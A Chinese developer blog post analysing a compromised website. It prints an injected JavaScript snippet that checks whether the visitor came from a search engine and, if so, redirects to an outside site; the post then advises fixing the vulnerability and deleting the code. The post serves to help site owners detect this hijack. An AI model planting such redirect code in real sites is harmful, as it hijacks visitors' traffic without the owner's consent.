分享一段流量劫持JS代码

于 2025-05-15 21:51:38 发布
阅读量239 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 原创经验分享 文章标签: javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akonezc/article/details/147992908

今天帮一个朋友分析了一个网站,症状是从搜索引擎访问,网站会跳转到另一个网站去,直接输入网址,网站没有发生跳转,通过一系列的分析发现罪魁祸首隐藏在js文件里面,下面是代码:

var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href='https://www.zuozi.net'
}

从日志上来看,是有人通过网站的漏洞在网站本身的js文件里面增加了一段代码,而这段代码会判断流量是否是从这些搜索引擎来的,如果是从搜索引擎来的,直接跳转到指定的网站,如果不是从这些搜索引擎来的,就不发生跳转,上面的代码中科院发现该黑客劫持了来自搜狗、百度、360、神马、必应、谷歌等搜索引擎的流量,如果你的网站发现类似的代码千万要小心。

解决办法:修复网站漏洞,删除可疑代码,问题即可得到解决。

博客
关于一些垃圾蛀虫的说明
05-15 262
奉劝某些人有点自知之明!自己没技术就别出来混,你应该后悔投错胎,“流下没有钱的眼泪!!!”,你应该后悔来到这个世上,你应该流下“后悔没有技术的眼泪”!!!,啥也不说了,只要你在特么骂骂咧咧的,我也不会和你客气!
博客
网站使用CDN后在线支付失败怎么办?
05-15 551
今天帮一个朋友分析了一个网站,症状是从搜索引擎访问,网站会跳转到另一个网站去,直接输入网址,网站没有发生跳转,通过一系列的分析发现罪魁祸首隐藏在js文件里面,下面是代码:
博客
快速免费用宝塔面板加开源小程序商城源码搭建自己的商城程序
05-09 928
本文介绍了如何免费搭建自己的小程序商城。首先,需要准备一台1核1g1m的服务器和一个备案域名。接着,安装宝塔面板系统,推荐使用CentOS 7.x操作系统,并确保系统内存至少为512MB。通过SSH连接服务器,根据操作系统选择相应的安装命令进行宝塔面板的安装。安装完成后,配置PHP和MySQL环境,创建网站并绑定域名。然后,在码云搜索并下载CRMEB小程序商城源码,将源码压缩后上传至服务器并解压。最后,通过宝塔面板设置网站目录和伪静态,安装必要的PHP扩展,访问域名进行安装配置,完成数据库和后台账号的设置。
博客
WordPress CMS系统在线安装详细教程及步骤
05-09 417
本文详细介绍了WordPress CMS系统的在线安装步骤。首先,主机空间需满足Linux+Nginx(Apache)+Mysql+Php环境,推荐使用php7.3和MySQL5.6版本。安装过程包括下载最新版Wordpress、通过FTP工具上传并解压文件、配置数据库信息、通过浏览器完成安装,以及选择和配置网站模板。完成这些步骤后,用户只需定期更新内容,等待搜索引擎收录即可。
博客
Git系列教程Gitee码云上传代码详解
05-09 394
本文介绍了如何在码云平台上进行项目管理的步骤。首先,用户需要注册并登录码云账户,完善个人信息。接着,为了简化操作,建议设置本机的SSH公钥以实现免密码登录。具体操作包括生成SSH密钥、复制公钥并添加到码云账户中。之后,用户可以在码云上新建项目并克隆到本地。最后,通过Git命令将文件上传至码云仓库,完成项目文件的更新和同步。整个过程旨在帮助用户高效地使用码云进行代码管理和协作。
博客
干货,超全面详解Java开发环境搭建,看完记得收藏!!!
05-09 919
在软件开发中,开发环境的搭建是首要且关键的步骤,它直接影响后续开发的效率和质量。大公司通常由运维团队负责此任务,而小公司则可能由开发人员如开发经理承担。无论由谁负责,执行者需具备资深经验,以确保环境的稳定运行。本文旨在为未接触过服务器搭建的开发人员、初中级开发者及.NET转Java开发者提供指导,涵盖Linux、MySQL、JDK、Tomcat和Redis的安装与配置。内容包括操作系统的选择、虚拟机的安装、CentOS的部署、MySQL的安装与配置、JDK的环境变量设置、Tomcat的启动与访问,以及Red
博客
Swift编程:使用xcode创建第一个ios项目
05-09 349
在Xcode中创建第一个Swift项目的步骤如下:首先,打开Xcode并选择新建项目,选择“Single View Application”模板。接着,填写项目名称、公司名称和标识前缀,并选择Swift作为开发语言。然后,选择项目存放目录,并决定是否使用Git进行源代码管理。项目创建后,Xcode会生成一个默认的Swift文件,并打开Main.storyboard,这是一个功能比xib更强大的界面设计工具。如果仅开发iPhone应用,可以取消“Use AutoLayout”选项,并选择iPhone界面尺寸。
博客
Swift环境搭建配置教程
05-09 364
Swift是一门用于开发OSX和iOS应用程序的开源编程语言。要搭建Swift开发环境,首先需要一台运行OSX 10.9.3及以上系统的苹果电脑,并安装Xcode集成开发环境。Xcode可以通过Apple官网或百度软件中心下载安装。安装完成后,用户可以在Xcode中创建Playground,这是一个用于学习和测试Swift代码的交互式环境。通过在Playground中编写简单的Swift代码,如导入UIKit或Cocoa包并输出字符串,用户可以实时查看代码执行结果,从而快速入门Swift编程。
博客
PbootCMS转Eyoucms操作教程
05-09 185
本文介绍了如何将PbootCMS转换为Eyoucms的详细步骤。首先,在PbootCMS根目录下创建eyou文件夹,并解压Eyoucms源码到该文件夹。接着,通过浏览器访问二级目录进行安装,并登录后台升级到最新版本。随后,在后台云插件库搜索并安装转换插件,按照提示完成转换。最后,将原PbootCMS的图片文件夹复制到Eyoucms的相应目录下,确保前端页面图片正常显示。整个过程与织梦CMS转Eyoucms的操作类似。
博客
代理查询系统源码:构建高效网络代理的基石
05-08 899
在当今互联网时代,网络代理技术已成为企业和个人保护隐私、提升访问速度的重要工具。而作为这一技术的核心组成部分,其重要性不言而喻。本文将深入探讨代理查询系统源码的构建原理、应用场景以及如何通过优化源码来提升系统性能。
博客
起名网站源代码:打造个性化命名平台的技术解析
05-08 760
在互联网时代,起名不再是传统意义上的“查字典”或“凭感觉”,而是通过技术手段为用户提供精准、个性化的命名方案。作为一种高效便捷的工具,正逐渐成为企业、个人甚至品牌的命名首选。那么,如何从零开始构建一个起名网站?其背后的又蕴含了哪些技术奥秘?本文将深入探讨起名网站的开发逻辑与关键技术,为有志于搭建命名平台的开发者提供实用参考。
博客
深入解析Android系统源代码:从架构到应用场景
05-08 1148
在移动互联网时代,Android系统凭借其开放性和灵活性,成为全球最流行的移动操作系统之一。对于开发者、技术爱好者以及企业而言,深入理解不仅有助于优化应用性能,还能为定制化开发提供强大的技术支持。本文将从以及三个方面,带您全面解析Android系统源代码的奥秘。
博客
Vue前端开发中的SEO搜索引擎优化策略
05-08 1007
在当今的互联网时代,搜索引擎优化(SEO)已经成为网站成功的关键因素之一。对于使用Vue.js进行前端开发的开发者来说,如何在单页应用(SPA)中实现有效的SEO优化,是一个值得深入探讨的话题。Vue.js以其灵活性和高效性在前端开发中广受欢迎,但其SPA特性却给SEO带来了一定的挑战。本文将为您详细解析如何在Vue前端开发中实现SEO优化,确保您的网站在搜索引擎中获得更高的排名。
博客
韩国Naver邮箱注册方法和流程
05-08 4725
输入信息完成之后点击注册,就会显示注册成功的界面,这就说明naver账号注册成功,点击“start”就可以开始naver的使用生活了,我们要记住自己的账号密码哦!naver账号注册成功过后,naver邮箱也是可以正常使用的,因为naver账号和naver邮箱账号是通用的!在注册Naver邮箱时,你需要提供一个有效的电子邮件地址。Naver是韩国著名社交软件LINE的母公司,拥有了Naver账号,登录韩国很多游戏包括dnf手游,网站,TV等等只要Naver旗下产品都可以直接使用Naver账号登陆方便快捷。
博客
解决WordPress网站图标favicon在bing搜索引擎不显示问题!
05-05 423
bing 搜索引擎在国内的市场占有率已经超过了百度,是各位站长必须要重点关注的数据来源。我最近发现我的网站在 bing 搜索结果页面不显示网站图标 favicon。我们该怎么解决这个问题呢?4,你会收到创建工单的邮件,以及后续处理解决的邮件。我按照此方法处理了我的网站网站,目前都成功显示网站图标。解决办法就是在 webmasters tools(bing 网站管理员工具)中向 bing 官网 反应问题,提交工单。1,进入 bing 网站管理员工具,点击右上角的“?”,点击联系支持人员,必应网站管理员支持。
博客
thinkphp5的项目定时任务实现方案
05-04 298
2.在宝塔添加shell脚本计划任务,比如每隔1分钟执行一次【这里需要注意脚本执行权限问题】1.把定时任务的php命令放到统一一个shell脚本里面。
博客
PHP也来实现计算MD5和SHA1散列
05-03 714
计算字符串的MD5和SHA1散列的函数和计算文件的MD5和SHA1散列的函数不是一个,共需要用到4个内置函数。因为计算字符串的散列的函数和计算文件的散列的函数不是同一个,先要通过参数告诉程序是计算字符串的MD5和SHA1散列还是计算文件的MD5和SHA1散列,如果参数是s就是计算字符串的MD5和SHA1散列,如果参数是f还是计算字符串的MD5和SHA1散列。用计算文件散列的小工具Hash来计算文件md5sha1.php的MD5和SHA1散列,发现计算结果和我的PHP程序计算出的结果完全相同。
博客
Windows shell 扩展编程教程详解
05-03 1101
接着,在类声明里,加入Initialize()的函数原型。首先我们检查uFlags,你可以在MSDN中找到所有标志的解释,但对于上下文菜单扩展而言,只有一个值是重要的:CMF DEFAULTONLY该标志告诉Shell命名空间扩展保留默认的菜单项,这时我们的Shell扩展就不应该加入任何定制的菜单项,这也是为什么此时我们要返回O的原因。(一个PIDL[指向ID列表的指针)是一个数据结构,它唯一地标识了在Shell命名空间的任何对象,一个Shell命名空间中的对象可以是也可以不是真实的文件系统中的对象。
博客
PHP实战攻略——SQL篇
05-03 970
接下来我们就讲解一下基本的php操作mysql的理论,实践先不说下,首先,我们知道,mysql是一个独立的软件,而我们写的php程序和PHP服务器,也构成了一个软件,现在我们要通过php来操Fmysql,说白了,其实是两个软件之间的数据互访。目的明确,知道我需要让数据库做什么,最重要的还要知道数据库能做什么,那么学习起来就会很容易,php和我们在命令行中管理是一样的思路,只是数据库连接需要我们自己获取,就是取得连接,选择数据库,执行此操作,处理数据,关闭连接,释放资源,短短的几步就可以完全镇定。
博客
Tencent,我的电脑你别动!
05-03 278
我们找到QQ修改注册表的相应位置:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,右键选择权限,在弹出的对话框中选择我们当前的登录的用户名(一般默认是第一项),点击下面的高级,在弹出的对话框中选中我们刚才选中的用户,点击下面的编辑。虽然是QQ的东西,不过没有人对它有好感,恶意评论率达到80%,看来tencent现在的东西越来越让人烦了,我赶紧使用360把它清除了,完毕后又使用360彻底检查了一遍,确定没有后,又开始安心的上网了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值